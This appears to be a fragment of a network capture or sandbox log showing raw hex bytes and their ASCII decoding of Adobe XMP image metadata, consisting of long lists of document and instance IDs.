43 36 39 35 43 46 38 39 35 36 33 30 37 36 36 38 34 38 32 37 46 36 37 32 46 38 41 3c 2f 72 64 66 3a 6c 69 3e
                                                                                                                                                                                    Data Ascii: f:li> <rdf:li>C0B1D3B4EE851A566DF07C8BAB1F5DE5</rdf:li> <rdf:li>C0BAFAD6631D3B9B6FB45CCF74A36743</rdf:li> <rdf:li>C0C9EED23722AA487E4ECB7D57AB3552</rdf:li> <rdf:li>C0D0511ACC9EF14CE8BB368FB68E2D2E</rdf:li> <rdf:li>C0FEAC695CF89563076684827F672F8A</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9385INData Raw: 39 41 46 41 31 39 35 34 39 37 38 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 44 42 42 41 46 32 30 42 37 41 35 44 43 32 39 34 37 45 36 36 39 32 45 35 35 46 34 42 43 35 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 44 42 46 41 39 41 32 35 39 45 42 45 38 41 42 36 45 41 46 39 38 39 30 37 35 37 32 44 30 34 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 44 43 43 37 46 36 45 43 37 35 31 31 31 42 35 35 35 31 33 37 39 44 45 45 31 32 41 34 45 39 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 44 44 30 36 41 33 43 45 32 46 39 45 30 35 31 39 42 43 36 31 41 35 38 37 33 37 31 45 42 39 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 43 44 44 32 33 39 45 41 45 34 36 41 39 39 45 30 45 39 35 43 42 31 32 35 44
                                                                                                                                                                                    Data Ascii: 9AFA1954978D</rdf:li> <rdf:li>CDBBAF20B7A5DC2947E6692E55F4BC5E</rdf:li> <rdf:li>CDBFA9A259EBE8AB6EAF98907572D043</rdf:li> <rdf:li>CDCC7F6EC75111B5551379DEE12A4E99</rdf:li> <rdf:li>CDD06A3CE2F9E0519BC61A587371EB98</rdf:li> <rdf:li>CDD239EAE46A99E0E95CB125D
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9401INData Raw: 36 33 45 35 31 41 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 38 41 42 43 31 31 42 30 44 38 32 33 34 34 37 34 33 37 31 39 30 46 41 41 38 42 41 43 36 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 39 30 39 33 33 39 35 33 39 39 45 42 38 38 37 39 33 39 35 45 31 32 41 31 45 37 32 35 31 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 39 37 39 39 37 37 42 45 45 32 46 30 31 41 38 41 33 39 35 37 32 39 43 41 35 30 43 33 43 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 41 41 31 37 31 37 46 34 37 41 39 41 31 34 43 33 44 42 39 39 36 34 39 30 43 38 44 43 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 44 42 41 45 32 34 32 39 33 34 44 42 34 30 30 38 37 46 38 30 46 43 45 43 31 42 34 46 30 39
                                                                                                                                                                                    Data Ascii: 63E51A8</rdf:li> <rdf:li>DB8ABC11B0D823447437190FAA8BAC67</rdf:li> <rdf:li>DB9093395399EB8879395E12A1E7251E</rdf:li> <rdf:li>DB979977BEE2F01A8A395729CA50C3C7</rdf:li> <rdf:li>DBAA1717F47A9A14C3DB996490C8DC42</rdf:li> <rdf:li>DBAE242934DB40087F80FCEC1B4F09
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9407INData Raw: 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 30 44 39 32 42 37 35 37 42 44 30 46 43 37 31 42 44 36 33 39 30 31 46 30 31 38 42 39 41 38 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 31 31 35 46 39 42 43 45 44 43 34 33 41 32 43 38 39 34 30 37 33 44 37 39 43 32 36 42 42 32 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 31 31 44 34 35 35 36 42 31 37 39 34 31 35 36 36 44 41 44 35 36 38 30 34 31 30 38 32 31 32 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 31 32 36 37 36 36 35 33 39 36 31 43 37 38 42 46 37 31 39 46 33 43 42 45 41 39 30 30 46 35 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 31 33 32 36 45 30 35 44 34 31 32 32 32 33 37 34 39 35 31 42 45 32 31 35 30 32 39 30 34 43 35 3c 2f 72 64 66
                                                                                                                                                                                    Data Ascii: </rdf:li> <rdf:li>E0D92B757BD0FC71BD63901F018B9A81</rdf:li> <rdf:li>E115F9BCEDC43A2C894073D79C26BB26</rdf:li> <rdf:li>E11D4556B17941566DAD568041082125</rdf:li> <rdf:li>E12676653961C78BF719F3CBEA900F54</rdf:li> <rdf:li>E1326E05D41222374951BE21502904C5</rdf
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9423INData Raw: 43 30 34 46 31 31 44 32 35 31 42 30 37 31 39 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 44 31 42 45 43 32 39 34 46 31 33 30 41 45 39 45 38 39 38 46 46 35 30 42 42 46 45 36 33 45 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 44 32 35 31 35 34 38 32 45 43 31 45 46 35 36 34 44 46 35 33 37 30 39 30 46 46 31 44 45 42 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 44 32 35 36 33 33 44 30 42 38 33 41 34 32 43 30 35 34 33 34 31 37 39 44 44 36 44 44 46 35 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 44 33 46 42 30 30 46 45 32 35 30 45 31 30 30 39 38 34 33 42 35 34 43 46 43 30 34 45 33 45 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 45 44 34 33 33 44 39 32 30 32 41 38 33 46 31 42 44 39 42 31 33
                                                                                                                                                                                    Data Ascii: C04F11D251B0719E</rdf:li> <rdf:li>ED1BEC294F130AE9E898FF50BBFE63EA</rdf:li> <rdf:li>ED2515482EC1EF564DF537090FF1DEB6</rdf:li> <rdf:li>ED25633D0B83A42C05434179DD6DDF5E</rdf:li> <rdf:li>ED3FB00FE250E1009843B54CFC04E3E2</rdf:li> <rdf:li>ED433D9202A83F1BD9B13
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9439INData Raw: 46 39 35 41 34 35 32 44 34 37 43 43 43 35 35 46 37 34 32 32 45 43 45 45 44 37 32 32 46 39 42 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 39 35 41 44 30 43 33 31 37 45 45 39 37 35 36 32 37 36 37 45 45 35 36 46 45 32 35 36 36 35 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 39 35 46 36 41 38 37 32 33 42 37 45 33 33 38 44 42 38 30 45 46 34 30 34 44 35 42 39 39 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 39 36 39 33 46 38 44 32 43 35 35 37 44 33 41 44 37 42 41 33 30 39 34 37 43 33 34 39 34 42 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 39 37 45 42 33 38 46 36 35 36 36 45 36 31 35 37 43 45 36 35 36 43 31 42 30 46 33 41 38 46 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 46 39 38 31 30
                                                                                                                                                                                    Data Ascii: F95A452D47CCC55F7422ECEED722F9BB</rdf:li> <rdf:li>F95AD0C317EE97562767EE56FE256656</rdf:li> <rdf:li>F95F6A8723B7E338DB80EF404D5B9915</rdf:li> <rdf:li>F9693F8D2C557D3AD7BA30947C3494BD</rdf:li> <rdf:li>F97EB38F6566E6157CE656C1B0F3A8F6</rdf:li> <rdf:li>F9810
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9447INData Raw: 35 66 39 61 36 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 63 65 30 32 34 35 66 34 2d 64 34 38 66 2d 31 31 65 30 2d 61 34 38 64 2d 65 36 31 66 36 32 32 35 38 61 61 66 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 64 34 30 31 39 61 64 33 2d 63 30 31 30 2d 31 31 65 30 2d 39 37 35 38 2d 39 66 32 66 61 33 32 37 35 36 66 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 64 34 30 31 39 61 64 62 2d 63 30 31 30 2d 31 31 65 30 2d 39 37 35 38 2d 39 66 32 66 61 33 32 37 35 36 66 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 69 6e 64 64 3a 65
                                                                                                                                                                                    Data Ascii: 5f9a68</rdf:li> <rdf:li>adobe:docid:indd:ce0245f4-d48f-11e0-a48d-e61f62258aaf</rdf:li> <rdf:li>adobe:docid:indd:d4019ad3-c010-11e0-9758-9f2fa32756fa</rdf:li> <rdf:li>adobe:docid:indd:d4019adb-c010-11e0-9758-9f2fa32756fa</rdf:li> <rdf:li>adobe:docid:indd:e
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9463INData Raw: 34 61 35 2d 63 62 38 61 37 33 38 35 38 36 33 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 34 66 38 36 63 35 64 2d 33 37 62 65 2d 31 31 65 38 2d 39 36 37 38 2d 39 65 63 32 35 38 36 39 62 30 32 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 35 31 35 35 62 34 33 2d 66 66 36 37 2d 31 31 64 65 2d 62 33 61 39 2d 65 34 63 64 61 31 31 36 66 63 30 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 33 35 65 66 64 65 39 39 2d 30 61 30 38 2d 31 31 65 35 2d 61 63 37 31 2d 38 64 38 39 36 39 33 37 37 61 63 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c
                                                                                                                                                                                    Data Ascii: 4a5-cb8a7385863d</rdf:li> <rdf:li>adobe:docid:photoshop:34f86c5d-37be-11e8-9678-9ec25869b025</rdf:li> <rdf:li>adobe:docid:photoshop:35155b43-ff67-11de-b3a9-e4cda116fc0e</rdf:li> <rdf:li>adobe:docid:photoshop:35efde99-0a08-11e5-ac71-8d8969377ac2</rdf:li> <
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9479INData Raw: 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 31 33 61 39 36 38 35 2d 34 39 61 64 2d 31 31 64 38 2d 62 63 32 31 2d 65 35 62 37 35 31 63 65 63 62 32 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 31 62 34 61 65 30 33 2d 36 62 66 39 2d 31 31 64 39 2d 38 63 64 36 2d 65 63 33 34 39 30 34 38 64 35 37 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 31 66 30 62 64 63 38 2d 65 31 37 35 2d 31 31 64 38 2d 38 30 35 31 2d 38 38 38 38 33 63 33 30 36 63 63 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 36 32 31 35 65 62 61 32 2d 31 30 61 32 2d 65
                                                                                                                                                                                    Data Ascii: d:photoshop:613a9685-49ad-11d8-bc21-e5b751cecb20</rdf:li> <rdf:li>adobe:docid:photoshop:61b4ae03-6bf9-11d9-8cd6-ec349048d578</rdf:li> <rdf:li>adobe:docid:photoshop:61f0bdc8-e175-11d8-8051-88883c306cc2</rdf:li> <rdf:li>adobe:docid:photoshop:6215eba2-10a2-e
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9487INData Raw: 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 37 38 63 31 62 34 39 2d 36 38 34 30 2d 36 33 34 39 2d 38 64 31 34 2d 39 63 34 39 37 63 38 32 35 35 30 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 37 63 65 63 64 30 38 2d 34 32 39 61 2d 31 31 64 62 2d 62 38 38 62 2d 64 64 61 30 38 32 30 33 61 30 63 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 37 38 31 35 65 61 61 63 2d 30 32 31 62 2d 31 31 65 38 2d 39 38 30 63 2d 61 33 36 65 37 33 62 37 37 66 63 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63
                                                                                                                                                                                    Data Ascii: </rdf:li> <rdf:li>adobe:docid:photoshop:778c1b49-6840-6349-8d14-9c497c825503</rdf:li> <rdf:li>adobe:docid:photoshop:77cecd08-429a-11db-b88b-dda08203a0c5</rdf:li> <rdf:li>adobe:docid:photoshop:7815eaac-021b-11e8-980c-a36e73b77fc2</rdf:li> <rdf:li>adobe:doc
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9503INData Raw: 38 66 65 30 2d 39 66 63 35 2d 31 31 37 38 2d 62 65 64 33 2d 38 38 38 30 66 36 31 65 37 64 61 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 39 33 34 34 64 63 31 2d 36 66 33 30 2d 31 31 37 61 2d 62 36 66 63 2d 66 38 61 34 63 33 36 35 30 63 62 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 61 30 31 62 33 31 32 2d 61 66 61 31 2d 31 31 65 36 2d 61 34 66 39 2d 38 39 38 64 35 34 64 64 36 30 61 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 61 30 36 64 65 30 62 2d 39 64 63 33 2d 31 31 64 37 2d 39 37 35 64 2d 61 39 36 37 34 37 30
                                                                                                                                                                                    Data Ascii: 8fe0-9fc5-1178-bed3-8880f61e7dab</rdf:li> <rdf:li>adobe:docid:photoshop:a9344dc1-6f30-117a-b6fc-f8a4c3650cb6</rdf:li> <rdf:li>adobe:docid:photoshop:aa01b312-afa1-11e6-a4f9-898d54dd60aa</rdf:li> <rdf:li>adobe:docid:photoshop:aa06de0b-9dc3-11d7-975d-a967470
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9519INData Raw: 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 66 64 39 37 30 30 35 2d 33 32 33 65 2d 31 31 64 61 2d 38 66 37 31 2d 38 38 65 63 62 36 30 38 31 62 63 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 65 30 32 64 38 31 30 37 2d 31 39 61 61 2d 31 31 37 38 2d 39 63 37 34 2d 66 32 65 34 61 38 37 66 63 32 36 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 65 30 33 36 38 30 30 63 2d 30 35 63 66 2d 31 31 64 61 2d 61 32 32 64 2d 65 61 32 37 35 35 64 30 61 34 32 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73
                                                                                                                                                                                    Data Ascii: <rdf:li>adobe:docid:photoshop:dfd97005-323e-11da-8f71-88ecb6081bc5</rdf:li> <rdf:li>adobe:docid:photoshop:e02d8107-19aa-1178-9c74-f2e4a87fc266</rdf:li> <rdf:li>adobe:docid:photoshop:e036800c-05cf-11da-a22d-ea2755d0a42b</rdf:li> <rdf:li>adobe:docid:photos
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9526INData Raw: 38 2d 62 37 36 65 2d 66 39 37 35 37 31 36 66 65 64 64 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 66 36 61 35 38 66 32 62 2d 33 36 61 30 2d 31 31 65 37 2d 39 66 34 37 2d 62 39 62 32 66 31 34 34 36 38 31 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 66 36 63 32 39 35 64 35 2d 66 64 31 30 2d 31 31 65 35 2d 39 39 39 38 2d 64 35 62 33 35 39 32 37 62 38 65 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 66 36 63 64 65 66 62 37 2d 32 36 36 35 2d 31 31 37 38 2d 61 37 33 36 2d 39 66 35 31 37 33 63 37 32 36 32 64 3c 2f 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: 8-b76e-f975716fedd4</rdf:li> <rdf:li>adobe:docid:photoshop:f6a58f2b-36a0-11e7-9f47-b9b2f144681b</rdf:li> <rdf:li>adobe:docid:photoshop:f6c295d5-fd10-11e5-9998-d5b35927b8e0</rdf:li> <rdf:li>adobe:docid:photoshop:f6cdefb7-2665-1178-a736-9f5173c7262d</rdf:li
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9542INData Raw: 42 32 43 35 35 35 38 33 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 43 41 46 33 42 30 42 45 31 36 36 31 31 44 41 42 36 36 32 41 44 44 39 38 34 39 42 31 42 42 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 43 42 30 45 34 39 45 33 41 35 42 45 31 31 31 38 32 42 31 45 30 38 30 44 33 39 42 36 45 45 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 43 42 35 36 35 41 33 45 42 35 46 44 46 31 31 42 31 37 39 43 36 36 34 30 31 37 34 35 44 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 43 45 39 42 43 44 33 41 45 36 32 44 44 31 31 41 32 41 45 45 30 41 36 43 41 32 36 35 32 45 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 32 44 30
                                                                                                                                                                                    Data Ascii: B2C55583E</rdf:li> <rdf:li>uuid:2CAF3B0BE16611DAB662ADD9849B1BB0</rdf:li> <rdf:li>uuid:2CB0E49E3A5BE11182B1E080D39B6EEB</rdf:li> <rdf:li>uuid:2CB565A3EB5FDF11B179C66401745D0C</rdf:li> <rdf:li>uuid:2CE9BCD3AE62DD11A2AEE0A6CA2652E5</rdf:li> <rdf:li>uuid:2D0
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9558INData Raw: 69 64 3a 36 30 33 36 35 30 35 38 35 35 34 41 44 45 31 31 41 32 39 34 44 32 41 34 30 33 39 38 35 45 44 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 36 30 33 45 37 45 41 30 45 39 36 33 45 31 31 31 41 41 43 36 43 36 32 38 36 30 38 33 31 39 36 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 36 30 35 37 45 32 44 46 45 46 31 36 31 31 44 46 39 45 36 46 46 33 37 39 34 42 42 30 38 32 34 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 36 30 37 35 34 35 35 38 42 42 42 46 44 44 31 31 38 32 30 30 44 38 38 44 32 34 32 36 43 44 35 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 36 30 38 35 30 41 45 36 37 39 43 37 45 30 31 31 38 31 35 30 38 38 36 33 34 41 32 33 31 38 39 37
                                                                                                                                                                                    Data Ascii: id:60365058554ADE11A294D2A403985EDA</rdf:li> <rdf:li>uuid:603E7EA0E963E111AAC6C62860831962</rdf:li> <rdf:li>uuid:6057E2DFEF1611DF9E6FF3794BB0824F</rdf:li> <rdf:li>uuid:60754558BBBFDD118200D88D2426CD5B</rdf:li> <rdf:li>uuid:60850AE679C7E011815088634A231897
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9566INData Raw: 42 44 45 43 33 36 31 36 42 33 41 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 39 36 34 31 43 30 42 44 32 31 39 31 31 44 42 41 44 36 46 45 38 39 43 38 42 32 30 34 36 43 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 39 37 34 35 39 34 41 32 34 45 33 31 31 44 44 38 32 43 36 45 31 36 38 42 41 43 44 31 37 36 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 39 41 33 44 34 43 43 39 45 37 31 44 43 31 31 42 42 37 37 46 41 31 39 41 33 39 31 36 37 31 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 37 39 45 30 43 46 45 41 38 42 45 36 44 44 31 31 42 46 32 31 46 39 37 36 46 43 31 42 44 35 45 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a
                                                                                                                                                                                    Data Ascii: BDEC3616B3A1</rdf:li> <rdf:li>uuid:79641C0BD21911DBAD6FE89C8B2046C4</rdf:li> <rdf:li>uuid:7974594A24E311DD82C6E168BACD176C</rdf:li> <rdf:li>uuid:79A3D4CC9E71DC11BB77FA19A391671F</rdf:li> <rdf:li>uuid:79E0CFEA8BE6DD11BF21F976FC1BD5E7</rdf:li> <rdf:li>uuid:
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9582INData Raw: 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 43 45 32 30 44 34 36 30 31 32 41 45 30 31 31 38 45 35 42 43 33 45 38 33 42 31 41 42 41 31 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 44 33 44 45 30 36 41 33 32 41 34 44 45 31 31 41 45 35 33 46 43 41 32 42 35 34 43 31 45 41 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 44 34 45 41 34 32 37 36 37 33 38 44 46 31 31 39 41 31 43 43 36 34 34 35 33 39 38 41 33 39 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 44 35 43 46 38 31 37 42 34 45 37 44 42 31 31 41 37 37 30 43 43 43 44 31 38 39 45 46 46 45 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 41 44 38 31 37 37 44 36 34 38 35
                                                                                                                                                                                    Data Ascii: 3</rdf:li> <rdf:li>uuid:ACE20D46012AE0118E5BC3E83B1ABA19</rdf:li> <rdf:li>uuid:AD3DE06A32A4DE11AE53FCA2B54C1EA2</rdf:li> <rdf:li>uuid:AD4EA4276738DF119A1CC6445398A399</rdf:li> <rdf:li>uuid:AD5CF817B4E7DB11A770CCCD189EFFE6</rdf:li> <rdf:li>uuid:AD8177D6485
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9598INData Raw: 44 41 45 35 43 43 30 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 41 41 39 37 38 30 45 43 44 43 42 45 30 31 31 42 33 46 45 44 32 34 38 33 31 38 34 38 46 35 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 42 34 35 32 35 38 35 36 33 39 37 44 45 31 31 41 34 43 30 43 41 33 43 34 45 46 46 43 41 33 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 42 38 44 32 45 35 30 36 43 39 45 45 30 31 31 42 42 33 35 39 45 31 34 35 33 38 41 30 41 34 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 42 39 44 43 33 37 45 33 42 36 45 44 45 31 31 38 39 34 42 46 46 45 35 41 32 36 43 44 36 34 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 75 75 69 64 3a 45 42 46 31
                                                                                                                                                                                    Data Ascii: DAE5CC0C</rdf:li> <rdf:li>uuid:EAA9780ECDCBE011B3FED24831848F59</rdf:li> <rdf:li>uuid:EB4525856397DE11A4C0CA3C4EFFCA36</rdf:li> <rdf:li>uuid:EB8D2E506C9EE011BB359E14538A0A4D</rdf:li> <rdf:li>uuid:EB9DC37E3B6EDE11894BFFE5A26CD643</rdf:li> <rdf:li>uuid:EBF1
                                                                                                                                                                                    2023-01-05 07:58:12 UTC9606INData Raw: 2d 39 30 64 38 32 63 36 36 32 35 34 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 31 46 36 39 34 43 30 38 32 30 36 38 31 31 42 44 36 43 42 46 39 42 43 44 35 38 38 39 31 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 33 33 65 64 32 38 2d 63 66 38 34 2d 34 32 32 64 2d 61 39 36 33 2d 62 66 34 65 63 62 66 31 37 38 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 33 39 43 46 34 31 32 41 35 44 44 46 31 31 38 41 32 37 42 35 43 42 36 32 36 34 46 46 34 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 30 31 33 41 32 33 36 36 31 39 32 30 36 38 31 31 38 44 42 42 42 38 38 39 35 37 39 31 35 34 30 44 3c 2f 72 64 66 3a
                                                                                                                                                                                    Data Ascii: -90d82c662541</rdf:li> <rdf:li>xmp.did:011F694C08206811BD6CBF9BCD588912</rdf:li> <rdf:li>xmp.did:0133ed28-cf84-422d-a963-bf4ecbf17830</rdf:li> <rdf:li>xmp.did:0139CF412A5DDF118A27B5CB6264FF46</rdf:li> <rdf:li>xmp.did:013A2366192068118DBBB8895791540D</rdf:
